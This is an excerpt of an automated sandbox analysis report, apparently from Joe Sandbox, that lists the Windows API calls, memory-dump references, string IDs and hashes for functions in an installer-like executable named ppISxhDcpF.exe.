                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                • String ID: -B@$Call$N$open
                                                                                                                • API String ID: 3615053054-1446803726
                                                                                                                • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                • String ID: F
                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                APIs
                                                                                                                • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                • wsprintfA.USER32 ref: 00405DFB
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,?,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\ppISxhDcpF.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                • API String ID: 222337774-899692902
                                                                                                                • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                APIs
                                                                                                                • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\ppISxhDcpF.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\ppISxhDcpF.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                • CharPrevW.USER32(0040A300,0040A300,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                Strings
                                                                                                                • *?|<>/":, xrefs: 0040633B
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                                • "C:\Users\user\Desktop\ppISxhDcpF.exe", xrefs: 0040632D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Prev
                                                                                                                • String ID: "C:\Users\user\Desktop\ppISxhDcpF.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 589700163-1410267379
                                                                                                                • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2320649405-0
                                                                                                                • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(0042C248,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,755723A0), ref: 0040520F
                                                                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2531174081-0
                                                                                                                • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                • String ID: f
                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                • MulDiv.KERNEL32(000639E1,?,000639E5), ref: 00402D4D
                                                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                Strings
                                                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                APIs
                                                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                • String ID: Calibri
                                                                                                                • API String ID: 3808545654-1409258342
                                                                                                                • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                APIs
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2008032542.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2008007393.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008088602.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008146266.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 4216380887-0
                                                                                                                • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2008032542.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2008007393.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008088602.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008146266.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1780285237-0
                                                                                                                • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\ppISxhDcpF.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00402894
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                  • Part of subcall function 00403258: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004028B0
                                                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                  • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403091
                                                                                                                  • Part of subcall function 00403027: GetTickCount.KERNEL32 ref: 00403138
                                                                                                                  • Part of subcall function 00403027: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 00403161
                                                                                                                  • Part of subcall function 00403027: wsprintfW.USER32 ref: 00403174
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402928
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 2082585436-0
                                                                                                                • Opcode ID: a6b29bbfff6bedb85eff617e0f32f780eda951c653e88163e3cff6ef8cd4870b
                                                                                                                • Instruction ID: f11faf613eabf70f6da5efab5544ef3b1f343b4f82166007b8c29dabf9a1b1c4
